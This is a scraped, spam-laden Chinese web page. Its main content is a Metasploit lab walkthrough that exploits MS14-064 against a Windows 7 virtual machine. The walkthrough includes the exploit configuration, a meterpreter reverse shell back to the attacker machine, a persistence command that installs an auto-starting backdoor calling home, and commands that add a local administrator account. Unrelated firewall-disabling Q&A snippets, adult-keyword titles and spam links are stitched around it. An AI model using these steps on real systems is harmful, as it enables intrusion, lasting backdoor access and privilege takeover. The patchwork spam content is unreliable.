www.tjgcgs88.cn-狠狠久久亚洲欧美专区不卡,久久精品国产99久久无毒不卡,噼里啪啦国语版在线观看,zσzσzσ女人极品另类

  • <strike id="qgi8o"><td id="qgi8o"></td></strike>
  • <ul id="qgi8o"><acronym id="qgi8o"></acronym></ul>
  • <li id="qgi8o"></li>
    <ul id="qgi8o"></ul>
    <strike id="qgi8o"><rt id="qgi8o"></rt></strike>
    <ul id="qgi8o"><center id="qgi8o"></center></ul>
  • <kbd id="qgi8o"></kbd>

    win10虛擬機(jī)如何關(guān)閉防火墻

    win10虛擬機(jī)如何關(guān)閉防火墻(虛擬機(jī)中如何關(guān)閉防火墻)

    在VMware上建立兩個(gè)虛擬機(jī):win7和kali。

    Kali:它是Linux發(fā)行版的操作系統(tǒng),它擁有超過300個(gè)滲透測(cè)試工具,就不用自己再去找安裝包,去安裝到我們自己的電腦上了,畢竟自己從網(wǎng)上找到,也不安全。它甚至還集成了600多種黑客工具,很強(qiáng)大。

    可以永久免費(fèi)使用,基本上學(xué)黑客攻擊必會(huì)用到這個(gè)系統(tǒng)。

    靶機(jī):Win7 64位 (IP: 192.168.10.45)--用ipconfig進(jìn)行查詢。

    攻擊機(jī):Kali (IP:192.168.10.21)--用ifconfig進(jìn)行查詢。

    【一一幫助安全學(xué)習(xí),所有資源關(guān)注我,私信回復(fù)“資料”獲取一一】
    ①網(wǎng)絡(luò)安全學(xué)習(xí)路線
    ②20份滲透測(cè)試電子書
    ③安全攻防357頁(yè)筆記
    ④50份安全攻防面試指南
    ⑤安全紅隊(duì)滲透工具包
    ⑥網(wǎng)絡(luò)安全必備書籍
    ⑦100個(gè)漏洞實(shí)戰(zhàn)案例
    ⑧安全大廠內(nèi)部視頻資源
    ⑨歷年CTF奪旗賽題解析

    1、實(shí)驗(yàn)環(huán)境前提條件

    win7中,關(guān)閉防火墻(“打開網(wǎng)絡(luò)和共享中心”-“Windows防火墻”-“打開或關(guān)閉Windows防火墻”-均選擇關(guān)閉選項(xiàng))。

    保證兩個(gè)虛擬機(jī)是可以ping通的(尤其是在kali中去ping win7,看能否連通)。

    $ping 192.168.10.45

    2、打開Metasploit滲透工具

    Metasploit是一款開源的安全漏洞檢測(cè)工具,msfconsole用于啟動(dòng)msf終端:

    >msfconsole

    **結(jié)果:**成功進(jìn)入,進(jìn)入到"msf6>“的模式下

    3、查看需要利用的漏洞

    搜索漏洞,編號(hào)為MS14-064。

    MS14-064為Windows OLE自動(dòng)化陣列遠(yuǎn)程代碼執(zhí)行漏洞。當(dāng)IE不作訪問內(nèi)存中的對(duì)象時(shí),存在遠(yuǎn)程代碼執(zhí)行漏洞。OLE(對(duì)象鏈接與嵌入)是一種允許應(yīng)用程序共享數(shù)據(jù)和功能的技術(shù),遠(yuǎn)程攻擊者利用此漏洞通過構(gòu)造的網(wǎng)站執(zhí)行任意代碼,用戶使用IE瀏覽器查看該網(wǎng)站時(shí)允許遠(yuǎn)程執(zhí)行代碼。

    【補(bǔ)充:Windows系統(tǒng)漏洞微軟的漏洞編號(hào)命名格式為:MS14-064;

    MS Micosoft的縮寫,固定格式;
    14 表示年份,即2014年發(fā)布的漏洞;
    064 表示順序,即當(dāng)年度發(fā)布的第64個(gè)漏洞。

    >search ms14-064

    **結(jié)果:**可以看到返回了多條可利用的漏洞模塊信息

    4、嘗試?yán)闷渲幸粋€(gè)漏洞模塊進(jìn)行攻擊

    利用其中一個(gè)漏洞攻擊模塊-0模塊,進(jìn)行攻擊,進(jìn)入模塊中(注意:必須是“_”,不是“-”,否則會(huì)報(bào)錯(cuò))。

    >use exploit/windows/browser/ms14_064_ole_code_execution

    **結(jié)果:**成功切換到這個(gè)模塊之下--”msf6 exploit(windows/browser/ms14_064_ole_code_execution)>“

    并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”--沒有配置payload,默認(rèn)為 windows/meterpreter/reverse_tcp

    5、查看該漏洞模塊所需的參數(shù)情況

    進(jìn)到這個(gè)漏洞模塊之后,先查看該測(cè)試模塊的參數(shù)情況。類似于你使用一軟件,進(jìn)行攻擊,是不是需要先進(jìn)行一些簡(jiǎn)單的參數(shù)配置啊,需要告訴軟件,要向誰發(fā)起攻擊吧,這是最最基本的,所以,要配置,就要先查看都可以配置哪些參數(shù)。

    >show options

    **結(jié)果:**其中required顯示的值為yes的,代表是必須要設(shè)置的項(xiàng);顯示的值為no的,代表是不必須要設(shè)置的項(xiàng);

    重點(diǎn)關(guān)注6個(gè)參數(shù)配置,需要設(shè)置哪個(gè)就設(shè)置哪個(gè):

    Payload (攻擊載體-使用默認(rèn)的windows/meterpreter/reverse_tcp即可) ;

    SRVHOST (文件共享服務(wù)器-kali地址);

    SRVPORT (文件共享服務(wù)器的端口-使用默認(rèn)獲取的端口即可);

    LHOST (發(fā)起攻擊的地址-kali地址);

    LPORT (發(fā)起攻擊的端口-使用默認(rèn)獲取的端口即可);

    AllowPowershellPrompt (開啟瀏覽器插件,默認(rèn)為false)

    【補(bǔ)充說明:

    1)Payload中包含有需要在遠(yuǎn)程系統(tǒng)中運(yùn)行的惡意代碼,Payload是一種特殊模塊,它們能夠以漏洞利用模塊運(yùn)行,并能夠利用目標(biāo)系統(tǒng)中的安全漏洞實(shí)施攻擊。也就是說,漏洞利用模塊可以訪問目標(biāo)系統(tǒng),而其中的代碼定義了Payload在目標(biāo)系統(tǒng)中的行為。

    2)Payload模塊主要有以下三種類型:-Single -Stager -Stage

    Single是一種完全獨(dú)立的Payload,實(shí)現(xiàn)的目的也簡(jiǎn)單,但容易被捕捉到。

    Stager這種Payload負(fù)責(zé)建立目標(biāo)用戶與攻擊者之間的網(wǎng)絡(luò)連接,并下載額外的組件或應(yīng)用程序。 一種常見的Stagers Payload就是reverse_tcp,它可以讓目標(biāo)系統(tǒng)與攻擊者建立一條tcp連接(3次握手-4次揮手)(是一個(gè)基于TCP的反向鏈接反彈shell, 使用起來很穩(wěn)定)。

    Stage是Stager Payload下載的一種Payload組件,這種Payload可以提供更加高級(jí)的功能,而且沒有大小限制。

    3)windows/x64/meterpreter/reverse_tcp則由一個(gè)Stager Payload(reverse_tcp)和一個(gè)Stage Payload(meterpreter)組成。

    注意:Payload為windows/meterpreter/reverse_tcp 默認(rèn)獲取到的控制通道m(xù)eterpreter為32位,

    如果想將之后獲取到的控制通道m(xù)eterpreter改為64位,則設(shè)置。payload:windows/x64/meterpreter/reverse_tcp

    6、設(shè)置文件共享服務(wù)器

    發(fā)現(xiàn)SRVHOST為空,待設(shè)置,其它(payload/SRVPORT/LHOST/LPORT)均已獲取,且正確,設(shè)置SRVHOST的對(duì)應(yīng)的參數(shù)地址,它指的是文件共享服務(wù)器的地址,想一想,要設(shè)成誰?為什么?

    分析一下:是在哪里用到這個(gè)文件共享服務(wù)器?是不是會(huì)在生成一個(gè)網(wǎng)址,誘導(dǎo)用戶點(diǎn)擊了,就會(huì)直接連接到發(fā)起攻擊的主機(jī)上。那你們覺得應(yīng)該是誰生成這個(gè)連接呢?是用戶那邊么?還是攻擊者這邊?肯定是攻擊者這邊吧,我們是不知道會(huì)有誰點(diǎn)了這個(gè)網(wǎng)站鏈接吧。

    所以,我們才會(huì)對(duì)這個(gè)文件共享服務(wù)器的地址設(shè)置為kali的地址

    >set SRVHOST 192.168.10.217、開啟瀏覽器插件

    要把AllowPowershellPrompt的默認(rèn)參數(shù)false改為true,因?yàn)閙sf中自帶的漏洞是利用exp調(diào)用的是powershell(powershell是一種命令外殼程序和腳本環(huán)境),所以msf的exp代碼只對(duì)安裝了powershell的系統(tǒng)生效。

    >set AllowPowershellPrompt true8、再次進(jìn)行檢查

    查看對(duì)SRVHOST和AllowPowershellPrompt進(jìn)行的修改,是否修改成功

    >show options9、檢查無誤后,發(fā)起攻擊

    >run

    **結(jié)果:**生成一個(gè)網(wǎng)站的鏈接“Using URL : http://192.168.10.21:8080/xE6RxjSy,開啟服務(wù),光標(biāo)停留在這,等待有人點(diǎn)擊該網(wǎng)站鏈接。

    10、打開網(wǎng)站鏈接

    到win7中,在IE瀏覽器中打開網(wǎng)站鏈接: http://192.168.10.21:8080/xE6RxjSy,會(huì)提示是否允許打開一個(gè)文件,選擇“允許”之后,即可觸發(fā)會(huì)話連接。

    **結(jié)果1:**在win7中打開鏈接后,不會(huì)有任何的反饋結(jié)果。

    **結(jié)果2:**由于在win7中觸發(fā)打開了網(wǎng)址鏈接,那么,在kali中,則會(huì)觸發(fā)會(huì)話連接,結(jié)果顯示了是192.168.10.45(目標(biāo)主機(jī)win7)嘗試點(diǎn)擊了該網(wǎng)站鏈接,于是,kali利用MS14-064漏洞模塊對(duì)目標(biāo)主機(jī)發(fā)起了攻擊,最終,“meterpreter session 1 opened”--表明已經(jīng)開通192.168.10.21:4444和192.168.10.45:49191會(huì)話連接1。

    一般會(huì)自動(dòng)進(jìn)入控制通道m(xù)eterpreter,交互模式,表明攻擊成功。

    注意:

    一旦開通一個(gè)會(huì)話連接后,若系統(tǒng)沒有自動(dòng)進(jìn)入控制通道,則可以嘗試回車,進(jìn)行手動(dòng)連接。

    1)手動(dòng)查看當(dāng)前存在的會(huì)話

    注意在目錄msf>下,手動(dòng)查看當(dāng)前存在的會(huì)話。

    **結(jié)果:**當(dāng)前只有會(huì)話連接1,meterpreter建立的連接類型type是x86–32位的(由模塊中的payload設(shè)定),以及展示目標(biāo)主機(jī)192.168.10.45的基本信息和連接信息。

    >sessions

    2)選擇連接當(dāng)前已經(jīng)開通的會(huì)話1

    >sessions -i 1

    **結(jié)果:**成功進(jìn)入控制通道m(xù)eterpreter,交互模式,表明攻擊成功。

    11、植入后門程序

    在kali控制win7后,通過persistence,在目標(biāo)主機(jī)上生成一個(gè)后門程序,以便后續(xù)不再通過MS14-064漏洞進(jìn)行二次入侵,而是通過這個(gè)后門文件來入侵該主機(jī)【注意在控制通道m(xù)eterpreter>下】。

    注意:因?yàn)檫@個(gè)MS14-064漏洞很容易被修復(fù),一旦目標(biāo)主機(jī)進(jìn)行定期修補(bǔ)漏洞,那么通過MS14-064漏洞進(jìn)行入侵的路徑,就會(huì)失效,但植入的后門程序是不容易被發(fā)現(xiàn)和修復(fù)的,所以一旦入侵成功后,建議嘗試植入后門程序。

    通過persistence(支持多種方式啟動(dòng))植入固定的后門程序,設(shè)置相關(guān)參數(shù),設(shè)置回連地址和端口號(hào)。

    >run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21

    重點(diǎn)關(guān)注6個(gè)參數(shù)配置:

    -S:系統(tǒng)啟動(dòng)時(shí)自動(dòng)加載本程序(因?yàn)樵摵箝T程序是不能被目標(biāo)用戶發(fā)現(xiàn),更不需要讓目標(biāo)主機(jī)進(jìn)行點(diǎn)

    擊啟動(dòng)的,所以需要該程序有自動(dòng)加載的功能);

    -U:用戶登陸時(shí)自動(dòng)加載本程序;

    -X:開機(jī)時(shí)自動(dòng)加載本程序;

    -i: 自動(dòng)加載后,回連的時(shí)間間隔,即后門每隔多少秒嘗試連接回連地址;

    -r: 自動(dòng)加載后,回連的主機(jī)地址,回連到誰啊,自然是入侵的kali的地址;

    -p:自動(dòng)加載后,回連的端口號(hào),即kali地址的端口號(hào),理論上可隨意設(shè)置,但范圍不要超過65535,且

    不可設(shè)置為常見的特殊的端口號(hào);

    **結(jié)果1:**在kali中提示,成功生成一個(gè)后門程序yqLAOjt.vbs,自動(dòng)加載后會(huì)回連到192.168.10.21:40000,并保存于目標(biāo)主機(jī)win7中的C:\Users\18044\AppData\Local\Temp\目錄下。

    【**注意:**payload自動(dòng)設(shè)置為“windows/meterpreter/reverse_tcp”,LHOST設(shè)置為192.168.10.21,LPORT設(shè)置為40000】

    **結(jié)果2:**在win7中的C:\Users\18044\AppData\Local\Temp\目錄下,成功找到從攻擊主機(jī)kali植入的后門程序yqLAOjt.vbs

    【補(bǔ)充知識(shí)點(diǎn):

    1)端口號(hào)范圍:0~65535

    2)常見端口號(hào)列舉

    12、掛起當(dāng)前會(huì)話

    在成功植入后門程序后,我們還需要對(duì)該后門程序進(jìn)行驗(yàn)證,驗(yàn)證是否可以通過該后門程序成功入侵目標(biāo)主機(jī)win7,所以可先將當(dāng)前通過MS14-064漏洞開啟的會(huì)話連接掛起(background)或斷開(exit),均可

    meterpreter>background

    **結(jié)果:**成功將session會(huì)話1掛起到后臺(tái),并沒有斷開連接,且成功切換到msf >目錄下

    13、開啟監(jiān)聽模塊

    利用后門程序進(jìn)行攻擊,需要打開一個(gè)監(jiān)聽模塊,能夠反彈shell監(jiān)聽模塊,進(jìn)行攻擊,進(jìn)入模塊中

    >use exploit/multi/handler

    **結(jié)果:**成功切換到這個(gè)模塊之下--”msf6 exploit(multi/handler)>“

    并提示“Using configured payload generic/shell_reverse_tcp”--使用的payload為generic/shell_reverse_tcp

    14、查看該監(jiān)聽模塊所需的參數(shù)情況

    進(jìn)到這個(gè)監(jiān)聽模塊之后,先查看該模塊的參數(shù)情況。類似于你使用一軟件,進(jìn)行攻擊,是不是需要先進(jìn)行一些簡(jiǎn)單的參數(shù)配置啊,需要告訴軟件,要向誰發(fā)起攻擊吧,這是最最基本的,所以,要配置,就要先查看都可以配置哪些參數(shù)?

    >show options

    **結(jié)果:**其中required顯示的值為yes的,代表是必須要設(shè)置的項(xiàng);顯示的值為no的,代表是不必須要設(shè)置的項(xiàng);

    重點(diǎn)關(guān)注3個(gè)參數(shù)配置,需要設(shè)置哪個(gè)就設(shè)置哪個(gè):

    Payload:攻擊載體;

    LHOST:回連地址;

    LPORT:回連端口號(hào);

    15、設(shè)置攻擊載體、回連地址以及端口號(hào)

    因?yàn)槲覀円_啟的這個(gè)監(jiān)聽模塊,是專門針對(duì)于yqLAOjt.vbs后門程序,進(jìn)行實(shí)時(shí)監(jiān)聽,那么,必然需要將監(jiān)聽模塊的參數(shù)配置,與yqLAOjt.vbs后門程序的參數(shù)配置保持一致,只有這樣,才能達(dá)到準(zhǔn)確的監(jiān)聽

    之前制作yqLAOjt.vbs的參數(shù)為:

    "run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21"

    因此,我們也就需要將監(jiān)聽模塊的攻擊載體Payload,與后門程序的payload保持一致:

    >set payload windows/meterpreter/reverse_tcp

    需要將監(jiān)聽模塊的回連地址LHOST,與后門程序的LHOST保持一致:

    >set LHOST 192.168.10.21

    需要將監(jiān)聽模塊的回連地址的端口號(hào)LPORT,與后門程序的LPORT保持一致:

    >set LPORT 4000016、再次進(jìn)行檢查

    >show options17、檢查無誤后,發(fā)起攻擊

    >run

    **結(jié)果:**開啟針對(duì)192.168.10.21:40000的監(jiān)聽模式,因?yàn)閥qLAOjt.vbs后門程序已經(jīng)設(shè)置了自動(dòng)加載,所以一旦開啟監(jiān)聽模塊,立即會(huì)有反饋信息回連到192.168.10.21:40000上來。

    最終,“meterpreter session 2 opened”--表明已經(jīng)開通192.168.10.21:40000和192.168.10.45:49227的會(huì)話連接2。

    一般會(huì)自動(dòng)進(jìn)入控制通道m(xù)eterpreter,交互模式,表明攻擊成功。

    【注意:

    此時(shí),將當(dāng)前開啟的會(huì)話進(jìn)行掛起操作–background,再查看當(dāng)前已存在的會(huì)話–sessions,結(jié)果會(huì)得到已開啟兩個(gè)會(huì)話連接信息,要對(duì)這兩個(gè)會(huì)話連接進(jìn)行區(qū)分,分清楚,第一個(gè)會(huì)話連接是通過MS14-064漏洞開啟的,第二個(gè)會(huì)話連接是通過后門程序開啟的

    18、創(chuàng)建用戶、設(shè)置密碼

    1)拿到shell權(quán)限,獲得控制臺(tái)權(quán)限,可以獲取系統(tǒng)的控制臺(tái)C:\Windows\system32

    meterpreter>shell

    2)進(jìn)入后,可能會(huì)有亂碼的情況,解決亂碼問題

    C:\Windows\system32>chcp 65001

    3)顯示win7系統(tǒng)中所有的用戶

    C:\Windows\system32>net user

    4)創(chuàng)建用戶

    創(chuàng)建用戶,用戶名為test,密碼為test【net user 用戶名 密碼 /add】

    C:\Windows\system32>net user test test /add

    也可以不設(shè)置密碼,只創(chuàng)建用戶名為test1的無密碼用戶【net user 用戶名 /add】

    C:\Windows\system32>net user test1 /add

    **結(jié)果1:**在kali中,若結(jié)果顯示“the commad completed successfully”—代表“命令執(zhí)行成功” ,用戶創(chuàng)建成功 ;

    若結(jié)果顯示“system error 5 has occurred;access is denied”—“發(fā)生系統(tǒng)錯(cuò)誤5; 拒絕訪問”-----代表權(quán)限不夠的問題,需要**進(jìn)行提權(quán),可以利用bypassuac或者Windows內(nèi)核漏洞進(jìn)行提權(quán)

    **結(jié)果2:**在win7中,”控制面板“—”添加或刪除用戶賬戶“,查看成功新建的用戶test(標(biāo)準(zhǔn)用戶–密碼保護(hù))、test1(標(biāo)準(zhǔn)用戶–無密碼)

    5)將新用戶添加到administrator分組–提升到管理員權(quán)限【net localgroup administrators 用戶名 /add】

    C:\Windows\system32>net localgroup adminis trators test1 /add

    **結(jié)果1:**在kali中,顯示“the commad completed successfully”—代表“命令執(zhí)行成功” ,成功添加到administrator分組,提升管理員權(quán)限成功 ;

    **結(jié)果2:**在win7中,”控制面板“—”添加或刪除用戶賬戶“,查看新建的用戶test1用戶由之前的”標(biāo)準(zhǔn)用戶“提升至”管理員“,提升權(quán)限成功。



    這是水淼·dedeCMS站群文章更新器的試用版本更新的文章,故有此標(biāo)記(2023-10-27 08:34:26)



    windows10怎么關(guān)閉445端口
    1. 打開“控制面板”,選擇“系統(tǒng)和安全”。2. 點(diǎn)擊“Windows Defender防火墻”。3. 選擇“高級(jí)設(shè)置”。4. 在左側(cè)的面板中,選擇“入站規(guī)則”。5. 在右側(cè)的面板中,找到“文件和打印機(jī)共享(SMB-In)”。6. 右鍵單擊該規(guī)則,選擇“禁用規(guī)則”。完成以上步驟后,445端口就會(huì)被關(guān)閉。此時(shí),如果有...

    電腦軟路由器怎么設(shè)置怎么設(shè)置愛快軟路由
    不過我個(gè)人建議,如果只是測(cè)試玩下ROS,這么做還可以,如果為了省錢而用虛擬機(jī)路由的話,玩PC1的人會(huì)很痛苦的,雖然VM虛擬個(gè)ROS給個(gè)64M內(nèi)存都能出效果,不過玩上兩小時(shí)左右消耗的CPU資源會(huì)給你一種玩得想死的感覺現(xiàn)在都60元路由爛大街的時(shí)代,舍不得孩子套不著狼。‘伍’ 如何設(shè)置軟路由配置很簡(jiǎn)單,先打開DHCP服務(wù)端...

    ...page華碩筆記本W(wǎng)in10藍(lán)屏終止代碼PAGEFAULTINNONPAGEDAREA怎樣...
    3、禁用所有即時(shí)掃描文件的軟件, 如殺毒軟件、防火墻或備份工具。4、病毒引起的,建議您可以使用騰訊電腦管家殺毒軟件,全面的查殺病毒,徹底的清理干凈 D. 華碩筆記本,Win10藍(lán)屏,終止代碼PAGE FAULT IN NONPAGED AREA怎樣解決 一般會(huì)在以下兩種情況下發(fā)生藍(lán)屏: 系統(tǒng)更新后 使用過程中 系統(tǒng)更新后發(fā)生藍(lán)屏: PS:一般出現(xiàn)...

    win10系統(tǒng)遠(yuǎn)端桌面連線不上win7可以怎么解決
    win10系統(tǒng)遠(yuǎn)端桌面連線不上win7可以怎么解決 具體方法如下: 1、遠(yuǎn)端桌面連過去報(bào)如下錯(cuò)誤,反正就是連線不上遠(yuǎn)端桌面的埠,系統(tǒng)和裝置肯定是好的,從虛擬機(jī)器管理器連上。 2、檢查配置,發(fā)現(xiàn)該機(jī)器的網(wǎng)路位置變成了公用,在win10防火墻設(shè)定;專用網(wǎng)路是未連線,而公用網(wǎng)路是有1個(gè)活動(dòng)連線。 3、wi...

    win7來賓安全模式
    (6)在控制面板--Windows 防火墻--高級(jí)設(shè)置--入站規(guī)則--新建規(guī)則(7)選擇端口--協(xié)議和端口--TCP\/特定本地端口:同上的端口(8)下一步,選擇允許連接(9)下一步,選擇公用(10)下一步,名稱:遠(yuǎn)程桌面-新(TCP-In),描述:用于遠(yuǎn)程桌面服務(wù)的入站規(guī)則,以允許RDP通信。[TCP 同上的端口](11)刪除遠(yuǎn)程桌面(TCP-In)...

    win7如何關(guān)閉139窗口
    如果你的電腦是通過老式的COM、現(xiàn)在流行的USB數(shù)據(jù)線直接連接到打印機(jī),或者是通過打印機(jī)的ip直接連接,那你的電腦將不會(huì)受到影響,打印機(jī)服務(wù)依然可以正常使用。關(guān)閉方法方式:windows批處理腳本運(yùn)行環(huán)境:win7系統(tǒng)、win10系統(tǒng)步驟演示(以win7系統(tǒng)為例,演示圖片請(qǐng)放大查看!)查詢135 137 138 139 445端...

    怎樣關(guān)掉autium designer 中file in newer format
    先關(guān)閉殺毒軟件及防火墻。在虛擬光驅(qū)加載下載來的 ISO 文件,打開 虛擬光驅(qū)對(duì)應(yīng)的盤符,如下圖,運(yùn)行 AltiumInstaller.exe。啟動(dòng)程序安裝畫面。卸載的時(shí)候不能在控制面板中卸載,也是到這個(gè)目錄下運(yùn)行“AltiumUninstaller.exe”點(diǎn)擊“Next”進(jìn)入下一步 選擇語(yǔ)言“Chinese”,勾上“I accept the agreement”,...

    連接遠(yuǎn)程桌面時(shí)提示無法登錄怎么辦win10
    1、遠(yuǎn)程桌面連過去報(bào)如下錯(cuò)誤,反正就是連接不上遠(yuǎn)程桌面的端口,系統(tǒng)和設(shè)備肯定是好的,我從虛擬機(jī)管理器連上杠杠的。2、知道原因處理就快了,打開控制面板--網(wǎng)絡(luò)與internet--網(wǎng)格共享中心,發(fā)現(xiàn)在win10下網(wǎng)絡(luò)位置和win7完全不一樣,是不能直接修改的。3、在網(wǎng)絡(luò)菜單到處亂試,終于試到了一個(gè)辦法,...

    麒麟電腦安裝dns如何在電腦上設(shè)置dns
    當(dāng)您配置 DNS 和防火墻時(shí),這些問題都有可能發(fā)生。 ❷ 麒麟系統(tǒng)怎么安裝 1.首先用光盤引導(dǎo)系統(tǒng),,出現(xiàn)GRUB引導(dǎo)器,直接回車 2.等一會(huì)選擇安裝介質(zhì),由于我們示用虛擬機(jī)裝的ISO鏡像,所以選擇CDROM。 3.這里選擇是否檢測(cè)安裝光盤的完整性,會(huì)很慢,所以選擇skip跳過。 4.在這里選擇安裝方式,即以圖形界面安裝還是文本...

    Win10電腦不能遠(yuǎn)程桌面控制怎么辦
    遠(yuǎn)程桌面連過去報(bào)如下錯(cuò)誤,反正就是連接不上遠(yuǎn)程桌面的端口,系統(tǒng)和設(shè)備肯定是好的,我從虛擬機(jī)管理器連上杠杠的。網(wǎng)管的兄弟賭咒說沒調(diào)整過安全策略,只好自身查原因了,小編仔細(xì)看了配置,突然發(fā)現(xiàn)該機(jī)器的網(wǎng)絡(luò)位置變成了公用,在win10防火墻設(shè)置;專用網(wǎng)絡(luò)是未連接,而公用網(wǎng)絡(luò)是有1個(gè)活動(dòng)連接。win10...

    相關(guān)評(píng)說:

  • 巢夏18267209530: 怎樣關(guān)閉win10防火墻自動(dòng)開啟 -
    天心區(qū)沉孔: ______ windows10中關(guān)閉或者啟用防火墻方法 1、右鍵點(diǎn)擊開始菜單 2、在右鍵菜單中選擇“控制面板”(也可以通過其他方式打開控制面板) 3、在控制面板中,選擇查看方式為大圖標(biāo),或者小圖標(biāo) 4、選擇“windows 防火墻” 5、在右邊的菜單中選擇“啟用或者關(guān)閉windows防火墻” 6、在彈出的界面中,選擇“關(guān)閉windows防火墻” 注意事項(xiàng) 如非必要,不要關(guān)閉防火墻,以免系統(tǒng)受攻擊或者感染病毒
  • 巢夏18267209530: win10怎樣關(guān)閉或者啟用防火墻 -
    天心區(qū)沉孔: ______ win10開啟和關(guān)閉防火墻方法: 工具: win10正式版系統(tǒng) 1.首先右擊"網(wǎng)絡(luò)"圖標(biāo),在單擊“屬性”. 2.單擊”windows防火墻". 3.在單擊“打開或關(guān)閉windows防火墻". 4.選擇關(guān)閉windows防火墻. 以上就是win10關(guān)閉防火墻的方法. 同樣是啟用防火墻方法. 注:防火墻能有效阻止惡意網(wǎng)站和病毒,謹(jǐn)慎使用.
  • 巢夏18267209530: win10怎么關(guān)閉防火墻 -
    天心區(qū)沉孔: ______ 步驟 1、 關(guān)閉Win10系統(tǒng)的防火墻 1、右鍵點(diǎn)擊開始菜單按鈕,選擇控制面板; 2、在控制面板中依次打開 【系統(tǒng)和安全】——》【W(wǎng)indows防火墻】——》【啟用或關(guān)閉Windows防火墻】; 3、分別設(shè)置專用網(wǎng)絡(luò)和公用網(wǎng)絡(luò)的防火墻為關(guān)閉,然...
  • 巢夏18267209530: win10怎么關(guān)閉防火墻 win10正式版如何關(guān)閉/開啟防火墻設(shè)置 -
    天心區(qū)沉孔: ______ 1、首先在Win10桌面找到“網(wǎng)絡(luò)”圖標(biāo),然后在其上鼠標(biāo)右鍵,在彈出的右鍵菜單中,點(diǎn)擊進(jìn)入“屬性”, 2、在打開的網(wǎng)絡(luò)和共享中心界面的左下角就可以找到“Windows防火墻”設(shè)置選項(xiàng),點(diǎn)擊進(jìn)入 3、打開Windows防火墻設(shè)置后,就可以進(jìn)行“啟用或關(guān)閉Windows防火墻”、“還原默認(rèn)”、“高級(jí)設(shè)置”等操作,如果要關(guān)閉防火墻,則點(diǎn)擊進(jìn)入“啟用或關(guān)閉Windows防火墻”選項(xiàng) 4、最后只需要將網(wǎng)絡(luò)設(shè)置選擇為“關(guān)閉Windows防火墻(不推薦)”,然后點(diǎn)擊底部的“確定”保存設(shè)置就可以了. 以上就是關(guān)閉Win10防火墻方法,如果后期需要開啟,同樣進(jìn)入上面的第四步,進(jìn)行開啟就可以了.
  • 巢夏18267209530: win10系統(tǒng)的防火墻怎么關(guān)閉 -
    天心區(qū)沉孔: ______ 點(diǎn)擊任務(wù)欄上的網(wǎng)絡(luò)圖標(biāo)——網(wǎng)絡(luò)設(shè)置——windows防火墻——啟用或關(guān)閉windows防火墻——在右邊關(guān)閉——確定:
  • 巢夏18267209530: 怎么關(guān)閉win10自帶的防火墻 -
    天心區(qū)沉孔: ______ 工具:電腦,WIN10 方法步驟: 1,打開控制面板. 2,點(diǎn)擊[Windows防火墻]. 3,進(jìn)入防火墻設(shè)置頁(yè)面點(diǎn)擊[啟用或關(guān)閉Windows防火墻]. 4,如下圖,選擇“關(guān)閉windows防火墻(不推薦)”點(diǎn)擊確認(rèn)即可完成操作.
  • 巢夏18267209530: win10電腦關(guān)閉防火墻怎么關(guān) -
    天心區(qū)沉孔: ______ 可參考以下步驟關(guān)閉windows 10中的windows defender: 1、點(diǎn)擊開始--設(shè)置--更新與安全; 2、點(diǎn)擊左側(cè)的 Windows Defender 一欄; 3、然后在 Windows Defender 的設(shè)置界面里,點(diǎn)擊關(guān)閉“實(shí)時(shí)保護(hù)”選項(xiàng)即可.
  • 巢夏18267209530: Win10防火墻怎么關(guān),怎么關(guān)閉win10防火墻 -
    天心區(qū)沉孔: ______ 1、首先右擊"網(wǎng)絡(luò)"圖標(biāo),在單擊“屬性”. 2、單擊”windows防火墻". 3、在單擊“啟用或關(guān)閉windows防火墻". 4 4、選擇”關(guān)windows防火墻(不推薦).在單擊“確定就可以完成了.
  • 巢夏18267209530: win10系統(tǒng)的防火墻怎么關(guān)閉 -
    天心區(qū)沉孔: ______ 步驟1、 關(guān)閉Win10系統(tǒng)的防火墻1、右鍵點(diǎn)擊開始菜單按鈕,選擇控制面板;2、在控制面板中依次打開 【系統(tǒng)和安全】——》【W(wǎng)indows防火墻】——》【啟用或關(guān)閉Windows防火墻】;3、分別設(shè)置專用網(wǎng)絡(luò)和公用網(wǎng)絡(luò)的防火墻為關(guān)閉,然后...
  • 巢夏18267209530: win10怎么關(guān)閉防火墻 -
    天心區(qū)沉孔: ______ 點(diǎn)擊任務(wù)欄上的網(wǎng)絡(luò)圖標(biāo)——網(wǎng)絡(luò)設(shè)置——windows防火墻——啟用或關(guān)閉windows防火墻——在右邊關(guān)閉——確定:
  • 久久久无码精品一区二区三区| 99热在线观看| 日日噜噜噜噜人人爽亚洲精品| 国产日韩欧美一区二区东京热| 青柠影院免费观看电视剧高清免费| 国产精品一区二区正在播放| 成全在线观看免费观看高清| 女性自慰aⅴ片高清免费| 日产精品卡二卡三卡四卡区满十八| gay男gay宾馆猛男1069|